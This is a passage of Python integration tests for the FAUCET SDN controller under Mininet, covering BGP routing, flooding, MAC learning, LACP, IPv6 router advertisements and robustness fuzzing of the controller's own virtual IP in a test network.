neighbor_addresses: ["127.0.0.1", "::1"]
vlan: 100
""" + """
neighbor_as: %u
""" % PEER_BGP_AS
CONFIG = """
arp_neighbor_timeout: 2
max_resolve_backoff_time: 1
""" + CONFIG_BOILER_UNTAGGED
exabgp_peer_conf = """
static {
route 0.0.0.0/0 next-hop 10.0.0.1 local-preference 100;
}
"""
exabgp_log = None
exabgp_err = None
config_ports = {'bgp_port': None}
def pre_start_net(self):
exabgp_conf = self.get_exabgp_conf(
mininet_test_util.LOCALHOST, self.exabgp_peer_conf)
self.exabgp_log, self.exabgp_err = self.start_exabgp(exabgp_conf)
def test_untagged(self):
"""Test IPv4 routing, and BGP routes received."""
first_host, second_host = self.hosts_name_ordered()[:2]
first_host_alias_ip = ipaddress.ip_interface('10.99.99.99/24')
first_host_alias_host_ip = ipaddress.ip_interface(
ipaddress.ip_network(first_host_alias_ip.ip))
self.host_ipv4_alias(first_host, first_host_alias_ip)
self.wait_bgp_up(
mininet_test_util.LOCALHOST, 100, self.exabgp_log, self.exabgp_err)
self.assertGreater(
self.scrape_prometheus_var(
'bgp_neighbor_routes', {'ipv': '4', 'vlan': '100'}),
0)
self.wait_exabgp_sent_updates(self.exabgp_log)
self.add_host_route(
second_host, first_host_alias_host_ip, self.FAUCET_VIPV4.ip)
for _ in range(2):
self.one_ipv4_ping(second_host, first_host_alias_ip.ip)
self.one_ipv4_controller_ping(first_host)
self.coldstart_conf()
class FaucetUntaggedBGPIPv4DefaultRouteTest(FaucetUntaggedTest):
"""Test IPv4 routing and import default route from BGP."""
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
faucet_vips: ["10.0.0.254/24"]
routers:
router1:
bgp:
as: 1
connect_mode: "passive"
port: %(bgp_port)d
routerid: "1.1.1.1"
server_addresses: ["127.0.0.1"]
neighbor_addresses: ["127.0.0.1"]
vlan: 100
""" + """
neighbor_as: %u
""" % PEER_BGP_AS
CONFIG = """
arp_neighbor_timeout: 2
max_resolve_backoff_time: 1
""" + CONFIG_BOILER_UNTAGGED
exabgp_peer_conf = """
static {
route 0.0.0.0/0 next-hop 10.0.0.1 local-preference 100;
}
"""
exabgp_log = None
exabgp_err = None
config_ports = {'bgp_port': None}
def pre_start_net(self):
exabgp_conf = self.get_exabgp_conf(
mininet_test_util.LOCALHOST, self.exabgp_peer_conf)
self.exabgp_log, self.exabgp_err = self.start_exabgp(exabgp_conf)
def test_untagged(self):
"""Test IPv4 routing, and BGP routes received."""
first_host, second_host = self.hosts_name_ordered()[:2]
first_host_alias_ip = ipaddress.ip_interface('10.99.99.99/24')
first_host_alias_host_ip = ipaddress.ip_interface(
ipaddress.ip_network(first_host_alias_ip.ip))
self.host_ipv4_alias(first_host, first_host_alias_ip)
self.wait_bgp_up(
mininet_test_util.LOCALHOST, 100, self.exabgp_log, self.exabgp_err)
self.assertGreater(
self.scrape_prometheus_var(
'bgp_neighbor_routes', {'ipv': '4', 'vlan': '100'}),
0)
self.wait_exabgp_sent_updates(self.exabgp_log)
self.add_host_route(
second_host, first_host_alias_host_ip, self.FAUCET_VIPV4.ip)
self.one_ipv4_ping(second_host, first_host_alias_ip.ip)
self.one_ipv4_controller_ping(first_host)
self.coldstart_conf()
class FaucetUntaggedBGPIPv4RouteTest(FaucetUntaggedTest):
"""Test IPv4 routing and import from BGP."""
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
faucet_vips: ["10.0.0.254/24"]
routes:
- route:
ip_dst: 10.99.99.0/24
ip_gw: 10.0.0.1
routers:
router1:
bgp:
as: 1
connect_mode: "passive"
port: %(bgp_port)d
routerid: "1.1.1.1"
server_addresses: ["127.0.0.1"]
neighbor_addresses: ["127.0.0.1"]
vlan: 100
""" + """
neighbor_as: %u
""" % PEER_BGP_AS
CONFIG = """
arp_neighbor_timeout: 2
max_resolve_backoff_time: 1
""" + CONFIG_BOILER_UNTAGGED
exabgp_peer_conf = """
static {
route 10.0.1.0/24 next-hop 10.0.0.1 local-preference 100;
route 10.0.2.0/24 next-hop 10.0.0.2 local-preference 100;
route 10.0.3.0/24 next-hop 10.0.0.2 local-preference 100;
route 10.0.4.0/24 next-hop 10.0.0.254;
route 10.0.5.0/24 next-hop 10.10.0.1;
}
"""
exabgp_log = None
exabgp_err = None
config_ports = {'bgp_port': None}
def pre_start_net(self):
exabgp_conf = self.get_exabgp_conf(
mininet_test_util.LOCALHOST, self.exabgp_peer_conf)
self.exabgp_log, self.exabgp_err = self.start_exabgp(exabgp_conf)
def test_untagged(self):
"""Test IPv4 routing, and BGP routes received."""
first_host, second_host = self.hosts_name_ordered()[:2]
# wait until 10.0.0.1 has been resolved
self.wait_for_route_as_flow(
first_host.MAC(), ipaddress.IPv4Network('10.99.99.0/24'))
self.wait_bgp_up(
mininet_test_util.LOCALHOST, 100, self.exabgp_log, self.exabgp_err)
self.assertGreater(
self.scrape_prometheus_var(
'bgp_neighbor_routes', {'ipv': '4', 'vlan': '100'}),
0)
self.wait_exabgp_sent_updates(self.exabgp_log)
self.verify_invalid_bgp_route(r'.+10.0.4.0\/24.+cannot be us$')
self.verify_invalid_bgp_route(r'.+10.0.5.0\/24.+because nexthop not in VLAN.+')
self.wait_for_route_as_flow(
second_host.MAC(), ipaddress.IPv4Network('10.0.3.0/24'))
self.verify_ipv4_routing_mesh()
self.flap_all_switch_ports()
self.verify_ipv4_routing_mesh()
for host in first_host, second_host:
self.one_ipv4_controller_ping(host)
self.verify_traveling_dhcp_mac()
class FaucetUntaggedIPv4RouteTest(FaucetUntaggedTest):
"""Test IPv4 routing and export to BGP."""
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
faucet_vips: ["10.0.0.254/24"]
routes:
- route:
ip_dst: "10.0.1.0/24"
ip_gw: "10.0.0.1"
- route:
ip_dst: "10.0.2.0/24"
ip_gw: "10.0.0.2"
- route:
ip_dst: "10.0.3.0/24"
ip_gw: "10.0.0.2"
routers:
router1:
bgp:
as: 1
connect_mode: "passive"
port: %(bgp_port)d
routerid: "1.1.1.1"
server_addresses: ["127.0.0.1"]
neighbor_addresses: ["127.0.0.1"]
vlan: 100
""" + """
neighbor_as: %u
""" % PEER_BGP_AS
CONFIG = """
arp_neighbor_timeout: 2
max_resolve_backoff_time: 1
""" + CONFIG_BOILER_UNTAGGED
exabgp_log = None
exabgp_err = None
config_ports = {'bgp_port': None}
def pre_start_net(self):
exabgp_conf = self.get_exabgp_conf(mininet_test_util.LOCALHOST)
self.exabgp_log, self.exabgp_err = self.start_exabgp(exabgp_conf)
def test_untagged(self):
"""Test IPv4 routing, and BGP routes sent."""
self.verify_ipv4_routing_mesh()
self.flap_all_switch_ports()
self.verify_ipv4_routing_mesh()
self.wait_bgp_up(
mininet_test_util.LOCALHOST, 100, self.exabgp_log, self.exabgp_err)
self.assertGreater(
self.scrape_prometheus_var(
'bgp_neighbor_routes', {'ipv': '4', 'vlan': '100'}),
0)
# exabgp should have received our BGP updates
updates = self.exabgp_updates(self.exabgp_log)
for route_string in (
'10.0.0.0/24 next-hop 10.0.0.254',
'10.0.1.0/24 next-hop 10.0.0.1',
'10.0.2.0/24 next-hop 10.0.0.2',
'10.0.2.0/24 next-hop 10.0.0.2'):
self.assertTrue(re.search(route_string, updates), msg=updates)
# test nexthop expired when port goes down
first_host = self.hosts_name_ordered()[0]
match, table = self.match_table(ipaddress.IPv4Network('10.0.0.1/32'))
ofmsg = None
for _ in range(5):
self.one_ipv4_controller_ping(first_host)
ofmsg = self.get_matching_flow(match, table_id=table)
if ofmsg:
break
time.sleep(1)
self.assertTrue(ofmsg, msg=match)
self.set_port_down(self.port_map['port_1'])
for _ in range(5):
if not self.get_matching_flow(match, table_id=table):
return
time.sleep(1)
self.fail('host route %s still present' % match)
class FaucetUntaggedRestBcastIPv4RouteTest(FaucetUntaggedIPv4RouteTest):
CONFIG = """
arp_neighbor_timeout: 2
max_resolve_backoff_time: 1
interfaces:
%(port_1)d:
native_vlan: 100
restricted_bcast_arpnd: true
%(port_2)d:
native_vlan: 100
restricted_bcast_arpnd: true
%(port_3)d:
native_vlan: 100
restricted_bcast_arpnd: true
%(port_4)d:
native_vlan: 100
restricted_bcast_arpnd: true
"""
class FaucetUntaggedVLanUnicastFloodTest(FaucetUntaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
unicast_flood: True
"""
CONFIG = CONFIG_BOILER_UNTAGGED
def test_untagged(self):
self.ping_all_when_learned()
self.assertTrue(self.bogus_mac_flooded_to_port1())
class FaucetUntaggedNoVLanUnicastFloodTest(FaucetUntaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
unicast_flood: False
"""
CONFIG = CONFIG_BOILER_UNTAGGED
def test_untagged(self):
self.assertFalse(self.bogus_mac_flooded_to_port1())
class FaucetUntaggedPortUnicastFloodTest(FaucetUntaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
unicast_flood: False
"""
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 100
unicast_flood: True
%(port_2)d:
native_vlan: 100
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
"""
def test_untagged(self):
# VLAN-level config disabling unicast flooding takes precedence;
# port-level config cannot re-enable flooding.
self.assertFalse(self.bogus_mac_flooded_to_port1())
class FaucetUntaggedNoPortUnicastFloodTest(FaucetUntaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
unicast_flood: True
"""
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 100
unicast_flood: False
%(port_2)d:
native_vlan: 100
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
"""
def test_untagged(self):
self.assertFalse(self.bogus_mac_flooded_to_port1())
class FaucetUntaggedHostMoveTest(FaucetUntaggedTest):
def test_untagged(self):
self._enable_event_log()
first_host, second_host = self.hosts_name_ordered()[0:2]
for _ in range(2):
self.retry_net_ping(hosts=(first_host, second_host))
self.ping((first_host, second_host))
for host, in_port in (
(first_host, self.port_map['port_1']),
(second_host, self.port_map['port_2'])):
self.require_host_learned(host, in_port=in_port)
self.swap_host_macs(first_host, second_host)
for port in (self.port_map['port_1'], self.port_map['port_2']):
self.wait_until_matching_lines_from_file(
r'.+L2_LEARN.+"previous_port_no": %u.+' % port, self.event_log)
class FaucetUntaggedHostPermanentLearnTest(FaucetUntaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
"""
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 100
permanent_learn: True
%(port_2)d:
native_vlan: 100
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
"""
def test_untagged(self):
self.ping_all_when_learned(hard_timeout=0)
first_host, second_host, third_host = self.hosts_name_ordered()[:3]
self.assertTrue(self.prom_mac_learned(first_host.MAC(), port=self.port_map['port_1']))
# 3rd host impersonates 1st, but 1st host is still OK.
original_third_host_mac = third_host.MAC()
third_host.setMAC(first_host.MAC())
self.assertEqual(100.0, self.ping((second_host, third_host)))
self.assertTrue(self.prom_mac_learned(first_host.MAC(), port=self.port_map['port_1']))
self.assertFalse(self.prom_mac_learned(first_host.MAC(), port=self.port_map['port_3']))
self.retry_net_ping(hosts=(first_host, second_host))
# 3rd host stops impersonating, now everything fine again.
third_host.setMAC(original_third_host_mac)
self.ping_all_when_learned(hard_timeout=0)
class FaucetCoprocessorTest(FaucetUntaggedTest):
N_UNTAGGED = 3
N_TAGGED = 1
CONFIG = """
interfaces:
%(port_1)d:
coprocessor: {strategy: vlan_vid}
mirror: %(port_4)d
%(port_2)d:
native_vlan: 100
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
"""
def test_untagged(self):
# Inject packet into pipeline using coprocessor.
coprocessor_host, first_host, second_host, _ = self.hosts_name_ordered()
self.one_ipv4_ping(first_host, second_host.IP())
tcpdump_filter = ' and '.join((
'ether dst %s' % first_host.MAC(),
'ether src %s' % coprocessor_host.MAC(),
'icmp'))
cmds = [
lambda: coprocessor_host.cmd(
'arp -s %s %s' % (first_host.IP(), first_host.MAC())),
lambda: coprocessor_host.cmd(
'fping %s -c3 %s' % (self.FPING_ARGS_SHORT, first_host.IP())),
]
tcpdump_txt = self.tcpdump_helper(
first_host, tcpdump_filter, cmds, timeout=5, vflags='-vv', packets=1)
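# assertFalse(rx == 0): at least one ICMP frame injected via the coprocessor port must reach first_host.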
self.assertFalse(self.tcpdump_rx_packets(tcpdump_txt, packets=0))
class FaucetUntaggedLoopTest(FaucetTest):
NUM_DPS = 1
N_TAGGED = 0
N_UNTAGGED = 2
LINKS_PER_HOST = 2
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
"""
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 100
%(port_2)d:
native_vlan: 100
%(port_3)d:
native_vlan: 100
loop_protect: True
%(port_4)d:
native_vlan: 100
loop_protect: True
"""
def setUp(self): # pylint: disable=invalid-name
super(FaucetUntaggedLoopTest, self).setUp()
self.topo = self.topo_class(
self.OVS_TYPE, self.ports_sock, self._test_name(), [self.dpid],
n_tagged=self.N_TAGGED, n_untagged=self.N_UNTAGGED,
links_per_host=self.LINKS_PER_HOST, hw_dpid=self.hw_dpid)
self.start_net()
def total_port_bans(self):
total_bans = 0
for i in range(self.LINKS_PER_HOST * self.N_UNTAGGED):
port_labels = self.port_labels(self.port_map['port_%u' % (i + 1)])
total_bans += self.scrape_prometheus_var(
'port_learn_bans', port_labels, dpid=True, default=0)
return total_bans
def test_untagged(self):
first_host, second_host = self.hosts_name_ordered()
# Normal learning works
self.one_ipv4_ping(first_host, second_host.IP())
start_bans = self.total_port_bans()
# Create a loop between interfaces on second host - a veth pair,
# with two bridges, each connecting one leg of the pair to a host
# interface.
self.quiet_commands(second_host, (
'ip link add name veth-loop1 type veth peer name veth-loop2',
'ip link set veth-loop1 up',
'ip link set veth-loop2 up',
# TODO: tune for loop mitigation performance.
'tc qdisc add dev veth-loop1 root tbf rate 1000kbps latency 10ms burst 1000',
'tc qdisc add dev veth-loop2 root tbf rate 1000kbps latency 10ms burst 1000',
# Connect one leg of veth pair to first host interface.
'brctl addbr br-loop1',
'brctl setfd br-loop1 0',
'ip link set br-loop1 up',
'brctl addif br-loop1 veth-loop1',
'brctl addif br-loop1 %s-eth0' % second_host.name,
# Connect other leg of veth pair.
'brctl addbr br-loop2',
'brctl setfd br-loop2 0',
'ip link set br-loop2 up',
'brctl addif br-loop2 veth-loop2',
'brctl addif br-loop2 %s-eth1' % second_host.name))
# Flood some traffic into the loop
for _ in range(3):
first_host.cmd('fping %s -c3 10.0.0.254' % self.FPING_ARGS_SHORT)
end_bans = self.total_port_bans()
if end_bans > start_bans:
return
time.sleep(1)
self.assertGreater(end_bans, start_bans)
# Break the loop, and learning should work again
self.quiet_commands(second_host, (
'ip link set veth-loop1 down',
'ip link set veth-loop2 down',))
self.one_ipv4_ping(first_host, second_host.IP())
class FaucetUntaggedIPv4LACPTest(FaucetTest):
NUM_DPS = 1
N_TAGGED = 0
N_UNTAGGED = 2
LINKS_PER_HOST = 2
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
faucet_vips: ["10.0.0.254/24"]
"""
CONFIG = """
max_resolve_backoff_time: 1
lacp_timeout: 3
interfaces:
%(port_1)d:
native_vlan: 100
lacp: 1
%(port_2)d:
native_vlan: 100
lacp: 1
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
"""
def setUp(self): # pylint: disable=invalid-name
super(FaucetUntaggedIPv4LACPTest, self).setUp()
self.topo = self.topo_class(
self.OVS_TYPE, self.ports_sock, self._test_name(), [self.dpid],
n_tagged=self.N_TAGGED, n_untagged=self.N_UNTAGGED,
links_per_host=self.LINKS_PER_HOST, hw_dpid=self.hw_dpid)
self.start_net()
def test_untagged(self):
first_host = self.hosts_name_ordered()[0]
bond = 'bond0'
# Linux driver should have this state (0x3f/63)
#
# Actor State: 0x3f, LACP Activity, LACP Timeout, Aggregation, Synchronization, Collecting, Distributing
# .... ...1 = LACP Activity: Active
# .... ..1. = LACP Timeout: Short Timeout
# .... .1.. = Aggregation: Aggregatable
# .... 1... = Synchronization: In Sync
# ...1 .... = Collecting: Enabled
# ..1. .... = Distributing: Enabled
# .0.. .... = Defaulted: No
# 0... .... = Expired: No
# [Actor State Flags: **DCSGSA]
# FAUCET should have this state (0x3e/62)
# Actor State: 0x3e, LACP Timeout, Aggregation, Synchronization, Collecting, Distributing
# .... ...0 = LACP Activity: Passive
# .... ..1. = LACP Timeout: Short Timeout
# .... .1.. = Aggregation: Aggregatable
# .... 1... = Synchronization: In Sync
# ...1 .... = Collecting: Enabled
# ..1. .... = Distributing: Enabled
# .0.. .... = Defaulted: No
# 0... .... = Expired: No
# [Actor State Flags: **DCSGS*]
lag_ports = (1, 2)
synced_state_txt = r"""
Slave Interface: \S+-eth0
MII Status: up
Speed: \d+ Mbps
Duplex: full
Link Failure Count: \d+
Permanent HW addr: \S+
Slave queue ID: 0
Aggregator ID: \d+
Actor Churn State: monitoring
Partner Churn State: monitoring
Actor Churned Count: 0
Partner Churned Count: 0
details actor lacp pdu:
system priority: 65535
system mac address: 0e:00:00:00:00:99
port key: \d+
port priority: 255
port number: \d+
port state: 63
details partner lacp pdu:
system priority: 65535
system mac address: 0e:00:00:00:00:01
oper key: 1
port priority: 255
port number: %d
port state: 62
Slave Interface: \S+-eth1
MII Status: up
Speed: \d+ Mbps
Duplex: full
Link Failure Count: \d+
Permanent HW addr: \S+
Slave queue ID: 0
Aggregator ID: \d+
Actor Churn State: monitoring
Partner Churn State: monitoring
Actor Churned Count: 0
Partner Churned Count: 0
details actor lacp pdu:
system priority: 65535
system mac address: 0e:00:00:00:00:99
port key: \d+
port priority: 255
port number: \d+
port state: 63
details partner lacp pdu:
system priority: 65535
system mac address: 0e:00:00:00:00:01
oper key: 1
port priority: 255
port number: %d
port state: 62
""".strip() % tuple([self.port_map['port_%u' % i] for i in lag_ports])
lacp_timeout = 5
def prom_lacp_up_ports():
lacp_up_ports = 0
for lacp_port in lag_ports:
port_labels = self.port_labels(self.port_map['port_%u' % lacp_port])
lacp_state = self.scrape_prometheus_var('port_lacp_state', port_labels, default=0)
lacp_up_ports += 1 if lacp_state == 3 else 0
return lacp_up_ports
def require_lag_up_ports(expected_up_ports):
for _ in range(lacp_timeout*10):
if prom_lacp_up_ports() == expected_up_ports:
break
time.sleep(1)
self.assertEqual(prom_lacp_up_ports(), expected_up_ports)
def require_linux_bond_up():
for _retries in range(lacp_timeout*2):
result = first_host.cmd('cat /proc/net/bonding/%s|sed "s/[ \t]*$//g"' % bond)
result = '\n'.join([line.rstrip() for line in result.splitlines()])
with open(os.path.join(self.tmpdir, 'bonding-state.txt'), 'w') as state_file:
state_file.write(result)
if re.search(synced_state_txt, result):
break
time.sleep(1)
self.assertTrue(
re.search(synced_state_txt, result),
msg='LACP did not synchronize: %s\n\nexpected:\n\n%s' % (
result, synced_state_txt))
# Start with ports down.
for port in lag_ports:
self.set_port_down(self.port_map['port_%u' % port])
require_lag_up_ports(0)
orig_ip = first_host.IP()
switch = self.first_switch()
bond_members = [pair[0].name for pair in first_host.connectionsTo(switch)]
# Deconfigure bond members
for bond_member in bond_members:
self.quiet_commands(first_host, (
'ip link set %s down' % bond_member,
'ip address flush dev %s' % bond_member))
# Configure bond interface
self.quiet_commands(first_host, (
('ip link add %s address 0e:00:00:00:00:99 '
'type bond mode 802.3ad lacp_rate fast miimon 100') % bond,
'ip add add %s/24 dev %s' % (orig_ip, bond),
'ip link set %s up' % bond))
# Add bond members
for bond_member in bond_members:
self.quiet_commands(first_host, (
'ip link set dev %s master %s' % (bond_member, bond),))
for _flaps in range(2):
# All ports down.
for port in lag_ports:
self.set_port_down(self.port_map['port_%u' % port])
require_lag_up_ports(0)
# Pick a random port to come up.
up_port = random.choice(lag_ports)
self.set_port_up(self.port_map['port_%u' % up_port])
require_lag_up_ports(1)
# We have connectivity with only one port.
self.one_ipv4_ping(
first_host, self.FAUCET_VIPV4.ip, require_host_learned=False, intf=bond, retries=5)
for port in lag_ports:
self.set_port_up(self.port_map['port_%u' % port])
# We have connectivity with two ports.
require_lag_up_ports(2)
require_linux_bond_up()
self.one_ipv4_ping(
first_host, self.FAUCET_VIPV4.ip, require_host_learned=False, intf=bond, retries=5)
# We have connectivity if that random port goes down.
self.set_port_down(self.port_map['port_%u' % up_port])
require_lag_up_ports(1)
self.one_ipv4_ping(
first_host, self.FAUCET_VIPV4.ip, require_host_learned=False, intf=bond, retries=5)
for port in lag_ports:
self.set_port_up(self.port_map['port_%u' % port])
class FaucetUntaggedIPv4LACPMismatchTest(FaucetUntaggedIPv4LACPTest):
"""Ensure remote LACP system ID mismatch is logged."""
def test_untagged(self):
first_host = self.hosts_name_ordered()[0]
orig_ip = first_host.IP()
switch = self.first_switch()
bond_members = [pair[0].name for pair in first_host.connectionsTo(switch)]
for i, bond_member in enumerate(bond_members):
bond = 'bond%u' % i
self.quiet_commands(first_host, (
'ip link set %s down' % bond_member,
'ip address flush dev %s' % bond_member,
('ip link add %s address 0e:00:00:00:00:%2.2x '
'type bond mode 802.3ad lacp_rate fast miimon 100') % (bond, i*2+i),
'ip add add %s/24 dev %s' % (orig_ip, bond),
'ip link set %s up' % bond,
'ip link set dev %s master %s' % (bond_member, bond)))
log_file = os.path.join(self.tmpdir, 'faucet.log')
self.wait_until_matching_lines_from_file(r'.+actor system mismatch.+', log_file)
class FaucetUntaggedIPv4ControlPlaneFuzzTest(FaucetUntaggedTest):
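    """Fuzz the IPv4 control plane (fragmented pings, scapy-fuzzed ICMP/ARP) and verify the controller VIP still responds."""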
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
faucet_vips: ["10.0.0.254/24"]
"""
CONFIG = """
max_resolve_backoff_time: 1
""" + CONFIG_BOILER_UNTAGGED
def test_ping_fragment_controller(self):
first_host = self.hosts_name_ordered()[0]
first_host.cmd('ping -s 1476 -c 3 %s' % self.FAUCET_VIPV4.ip)
self.one_ipv4_controller_ping(first_host)
def test_fuzz_controller(self):
first_host = self.hosts_name_ordered()[0]
self.one_ipv4_controller_ping(first_host)
packets = 1000
fuzz_template = 'python3 -c \"from scapy.all import * ; scapy.all.send(%s, count=%u)\"'
for fuzz_cmd in (
fuzz_template % ('IP(dst=\'%s\')/fuzz(%s(type=0))' % (self.FAUCET_VIPV4.ip, 'ICMP'), packets),
fuzz_template % ('IP(dst=\'%s\')/fuzz(%s(type=8))' % (self.FAUCET_VIPV4.ip, 'ICMP'), packets),
fuzz_template % ('fuzz(%s(pdst=\'%s\'))' % ('ARP', self.FAUCET_VIPV4.ip), packets)):
fuzz_out = first_host.cmd(mininet_test_util.timeout_cmd(fuzz_cmd, 180))
self.assertTrue(
re.search('Sent %u packets' % packets, fuzz_out), msg='%s: %s' % (
fuzz_cmd, fuzz_out))
self.one_ipv4_controller_ping(first_host)
def test_flap_ping_controller(self):
first_host, second_host = self.hosts_name_ordered()[0:2]
for _ in range(5):
self.one_ipv4_ping(first_host, second_host.IP())
for host in first_host, second_host:
self.one_ipv4_controller_ping(host)
self.flap_all_switch_ports()
class FaucetUntaggedIPv4ControlPlaneTest(FaucetUntaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
faucet_vips: ["10.0.0.254/24"]
"""
CONFIG = """
max_resolve_backoff_time: 1
""" + CONFIG_BOILER_UNTAGGED
def test_fping_controller(self):
first_host = self.hosts_name_ordered()[0]
self.one_ipv4_controller_ping(first_host)
# Try 64 byte icmp packets
self.verify_controller_fping(first_host, self.FAUCET_VIPV4)
# Try 128 byte icmp packets
self.verify_controller_fping(first_host, self.FAUCET_VIPV4, size=128)
class FaucetUntaggedIPv6RATest(FaucetUntaggedTest):
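    """Test IPv6 router advertisements: ndisc6/rdisc6 responses, periodic RAs and replies to router solicitations."""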
FAUCET_MAC = "0e:00:00:00:00:99"
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
faucet_vips: ["fe80::1:254/64", "fc00::1:254/112", "fc00::2:254/112", "10.0.0.254/24"]
faucet_mac: "%s"
""" % FAUCET_MAC
CONFIG = """
advertise_interval: 5
""" + CONFIG_BOILER_UNTAGGED
def test_ndisc6(self):
first_host = self.hosts_name_ordered()[0]
for vip in ('fe80::1:254', 'fc00::1:254', 'fc00::2:254'):
self.assertEqual(
self.FAUCET_MAC.upper(),
first_host.cmd('ndisc6 -q %s %s' % (vip, first_host.defaultIntf())).strip())
def test_rdisc6(self):
first_host = self.hosts_name_ordered()[0]
rdisc6_results = sorted(list(set(first_host.cmd(
'rdisc6 -q %s' % first_host.defaultIntf()).splitlines())))
self.assertEqual(
['fc00::1:0/112', 'fc00::2:0/112'],
rdisc6_results)
def test_ra_advertise(self):
first_host = self.hosts_name_ordered()[0]
tcpdump_filter = ' and '.join((
'ether dst 33:33:00:00:00:01',
'ether src %s' % self.FAUCET_MAC,
'icmp6',
'ip6[40] == 134',
'ip6 host fe80::1:254'))
tcpdump_txt = self.tcpdump_helper(
first_host, tcpdump_filter, [], timeout=30, vflags='-vv', packets=1)
for ra_required in (
r'ethertype IPv6 \(0x86dd\), length 142',
r'fe80::1:254 > ff02::1:.+ICMP6, router advertisement',
r'fc00::1:0/112, Flags \[onlink, auto\]',
r'fc00::2:0/112, Flags \[onlink, auto\]',
r'source link-address option \(1\), length 8 \(1\): %s' % self.FAUCET_MAC):
self.assertTrue(
re.search(ra_required, tcpdump_txt),
msg='%s: %s' % (ra_required, tcpdump_txt))
def test_rs_reply(self):
first_host = self.hosts_name_ordered()[0]
tcpdump_filter = ' and '.join((
'ether src %s' % self.FAUCET_MAC,
'ether dst %s' % first_host.MAC(),
'icmp6',
'ip6[40] == 134',
'ip6 host fe80::1:254'))
tcpdump_txt = self.tcpdump_helper(
first_host, tcpdump_filter, [
lambda: first_host.cmd(
'rdisc6 -1 %s' % first_host.defaultIntf())],
timeout=30, vflags='-vv', packets=1)
for ra_required in (
r'fe80::1:254 > fe80::.+ICMP6, router advertisement',
r'fc00::1:0/112, Flags \[onlink, auto\]',
r'fc00::2:0/112, Flags \[onlink, auto\]',
r'source link-address option \(1\), length 8 \(1\): %s' % self.FAUCET_MAC):
self.assertTrue(
re.search(ra_required, tcpdump_txt),
msg='%s: %s (%s)' % (ra_required, tcpdump_txt, tcpdump_filter))
class FaucetUntaggedIPv6ControlPlaneFuzzTest(FaucetUntaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
faucet_vips: ["fc00::1:254/112"]
"""
CONFIG = """
max_resolve_backoff_time: 1
""" + CONFIG_BOILER_UNTAGGED
def test_flap_ping_controller(self):
first_host, second_host = self.hosts_name_ordered()[0:2]
self.add_host_ipv6_address(first_host, 'fc00::1:1/112')
self.add_host_ipv6_address(second_host, 'fc00::1:2/112')
for _ in range(5):
self.one_ipv6_ping(first_host, 'fc00::1:2')
for host in first_host, second_host:
self.one_ipv6_controller_ping(host)
self.flap_all_switch_ports()
def test_fuzz_controller(self):
first_host = self.hosts_name_ordered()[0]
self.add_host_ipv6_address(first_host, 'fc00::1:1/112')
self.one_ipv6_controller_ping(first_host)
fuzz_success = False
packets = 1000
count = 0
abort = False
def note(*args):
error('%s:' % self._test_name(), *args + tuple('\n'))
        # Some of these tests have been slowing down and timing out,
        # so this code is intended to allow some debugging and analysis.
for fuzz_class in dir(scapy.all):
if fuzz_class.startswith('ICMPv6'):
fuzz_cmd = ("from scapy.all import * ;"
"scapy.all.send(IPv6(dst='%s')/fuzz(%s()),count=%u)" %
(self.FAUCET_VIPV6.ip, fuzz_class, packets))
out, start, too_long = '', time.time(), 30 # seconds
popen = first_host.popen('python3', '-c', fuzz_cmd)
for _, line in pmonitor({first_host: popen}):
out += line
if time.time() - start > too_long:
note('stopping', fuzz_class, 'after >', too_long, 'seconds')
note('output was:', out)
popen.terminate()
abort = True
break
popen.wait()
if 'Sent %u packets' % packets in out:
count += packets
elapsed = time.time() - start
note('sent', packets, fuzz_class, 'packets in %.2fs' % elapsed)
fuzz_success = True
if abort:
break
note('successfully sent', count, 'packets')
self.assertTrue(fuzz_success)
note('pinging', first_host)
self.one_ipv6_controller_ping(first_host)
note('test_fuzz_controller() complete')
class FaucetUntaggedIPv6ControlPlaneTest(FaucetUntaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
faucet_vips: ["fc00::1:254/112"]
"""
CONFIG = """
max_resolve_backoff_time: 1
""" + CONFIG_BOILER_UNTAGGED
def test_fping_controller(self):
first_host = self.hosts_name_ordered()[0]
self.add_host_ipv6_address(first_host, 'fc00::1:1/112')
self.one_ipv6_controller_ping(first_host)
# Try 64 byte icmp6 packets
self.verify_controller_fping(first_host, self.FAUCET_VIPV6)
# Try 128 byte icmp6 packets
self.verify_controller_fping(first_host, self.FAUCET_VIPV6, size=128)
class FaucetTaggedAndUntaggedDiffVlanTest(FaucetTest):
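    """Test that tagged and untagged hosts on different VLANs are isolated, while hosts within each VLAN can ping."""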
N_TAGGED = 2
N_UNTAGGED = 4
LINKS_PER_HOST = 1
CONFIG_GLOBAL = """
vlans:
100:
description: "tagged"
101:
description: "untagged"
"""
CONFIG = """
interfaces:
%(port_1)d:
tagged_vlans: [100]
%(port_2)d:
tagged_vlans: [100]
%(port_3)d:
native_vlan: 101
%(port_4)d:
native_vlan: 101
"""
def setUp(self): # pylint: disable=invalid-name
super(FaucetTaggedAndUntaggedDiffVlanTest, self).setUp()
self.topo = self.topo_class(
self.OVS_TYPE, self.ports_sock, self._test_name(), [self.dpid],
n_tagged=2, n_untagged=2, links_per_host=self.LINKS_PER_HOST,
hw_dpid=self.hw_dpid)
self.start_net()
def test_separate_untagged_tagged(self):
tagged_host_pair = self.hosts_name_ordered()[:2]
